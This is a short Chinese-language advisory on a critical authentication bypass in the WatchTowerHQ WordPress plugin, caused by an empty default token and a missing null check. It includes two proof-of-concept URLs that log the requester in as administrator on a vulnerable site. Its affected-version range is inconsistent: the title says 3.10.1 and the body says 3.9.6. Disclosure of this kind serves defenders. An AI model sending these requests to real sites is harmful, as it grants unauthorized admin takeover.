WatchTowerHQ <= 3.10.1 - 因缺少空值检查导致认证绕过至管理员
WatchTowerHQ 的 WordPress 插件在 3.9.6 及之前版本中存在认证绕过漏洞。这是由于 'watchtower_ota_token' 的默认值为空,且 'Password_Less_Access::login' 函数中缺少非空检查。这使得未认证的攻击者可以登录为 WatchTowerHQ 客户端管理员用户。
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
OR
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
如果存在漏洞,它会让您以管理员身份登录。